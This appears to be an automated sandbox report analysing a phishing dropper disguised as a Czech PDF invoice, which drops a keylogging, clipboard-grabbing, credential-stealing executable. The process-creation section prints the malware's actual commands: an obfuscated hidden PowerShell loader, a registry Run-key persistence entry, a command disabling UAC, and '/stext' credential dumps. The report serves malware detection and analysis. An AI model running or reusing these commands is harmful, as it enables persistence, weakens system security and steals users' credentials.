Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49708 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Windows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\Nubilum.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 28_2_0041183A
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 28_2_0040987A
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 28_2_004098E2
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 29_2_00406DFC
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 29_2_00406E9F
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 30_2_004068B5
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 30_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Nubilum.exe PID: 7688, type: MEMORYSTR

System Summary

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Nubilum.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_02237270 Sleep,NtProtectVirtualMemory, 16_2_02237270
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 28_2_0040DD85
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00401806 NtdllDefWindowProc_W, 28_2_00401806
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_004018C0 NtdllDefWindowProc_W, 28_2_004018C0
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_004016FD NtdllDefWindowProc_A, 29_2_004016FD
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_004017B7 NtdllDefWindowProc_A, 29_2_004017B7
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00402CAC NtdllDefWindowProc_A, 30_2_00402CAC
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00402D66 NtdllDefWindowProc_A, 30_2_00402D66
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Code function: 0_2_00403311 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403311
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe File created: C:\Windows\SysWOW64\dodders Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_048AF000 2_2_048AF000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_048AF8D0 2_2_048AF8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_048AECB8 2_2_048AECB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0750BB78 2_2_0750BB78
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAC7194 16_2_1FAC7194
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FABB5C1 16_2_1FABB5C1
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044B040 28_2_0044B040
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0043610D 28_2_0043610D
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00447310 28_2_00447310
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044A490 28_2_0044A490
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0040755A 28_2_0040755A
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0043C560 28_2_0043C560
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044B610 28_2_0044B610
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044D6C0 28_2_0044D6C0
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_004476F0 28_2_004476F0
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044B870 28_2_0044B870
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044081D 28_2_0044081D
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00414957 28_2_00414957
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_004079EE 28_2_004079EE
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00407AEB 28_2_00407AEB
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044AA80 28_2_0044AA80
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00412AA9 28_2_00412AA9
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00404B74 28_2_00404B74
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00404B03 28_2_00404B03
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044BBD8 28_2_0044BBD8
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00404BE5 28_2_00404BE5
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00404C76 28_2_00404C76
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00415CFE 28_2_00415CFE
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00416D72 28_2_00416D72
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00446D30 28_2_00446D30
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00446D8B 28_2_00446D8B
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00406E8F 28_2_00406E8F
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00405038 29_2_00405038
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0041208C 29_2_0041208C
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_004050A9 29_2_004050A9
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0040511A 29_2_0040511A
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0043C13A 29_2_0043C13A
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_004051AB 29_2_004051AB
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00449300 29_2_00449300
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0040D322 29_2_0040D322
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0044A4F0 29_2_0044A4F0
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0043A5AB 29_2_0043A5AB
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00413631 29_2_00413631
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00446690 29_2_00446690
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0044A730 29_2_0044A730
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_004398D8 29_2_004398D8
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_004498E0 29_2_004498E0
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0044A886 29_2_0044A886
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0043DA09 29_2_0043DA09
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00438D5E 29_2_00438D5E
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00449ED0 29_2_00449ED0
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0041FE83 29_2_0041FE83
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00430F54 29_2_00430F54
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_004050C2 30_2_004050C2
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_004014AB 30_2_004014AB
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00405133 30_2_00405133
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_004051A4 30_2_004051A4
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00401246 30_2_00401246
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_0040CA46 30_2_0040CA46
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00405235 30_2_00405235
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_004032C8 30_2_004032C8
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_004222D9 30_2_004222D9
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00401689 30_2_00401689
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00402F60 30_2_00402F60
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: String function: 00413025 appears 79 times
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: String function: 00416760 appears 69 times
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe Static PE information: invalid certificate
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@23/23@4/5
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 28_2_004182CE
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Code function: 0_2_00403311 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403311
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 30_2_00410DE1
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 28_2_00418758
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 28_2_00413D4C
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 28_2_0040B58D
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe File created: C:\Users\user\AppData\Local\twinsomeness Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4D
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe File created: C:\Users\user~1\AppData\Local\Temp\nsyB32.tmp Jump to behavior
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Nubilum.exe, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Nubilum.exe, Nubilum.exe, 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Nubilum.exe, 00000010.00000002.3695789252.000000001F110000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Nubilum.exe, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Nubilum.exe, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Nubilum.exe, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Nubilum.exe, 0000001C.00000003.1711574673.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1713385295.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Nubilum.exe, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe Virustotal: Detection: 14%
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe File read: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe"
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\avtrjqntogc"
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma"
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux"
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\avtrjqntogc" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: wintypes.dll Jump to behavior
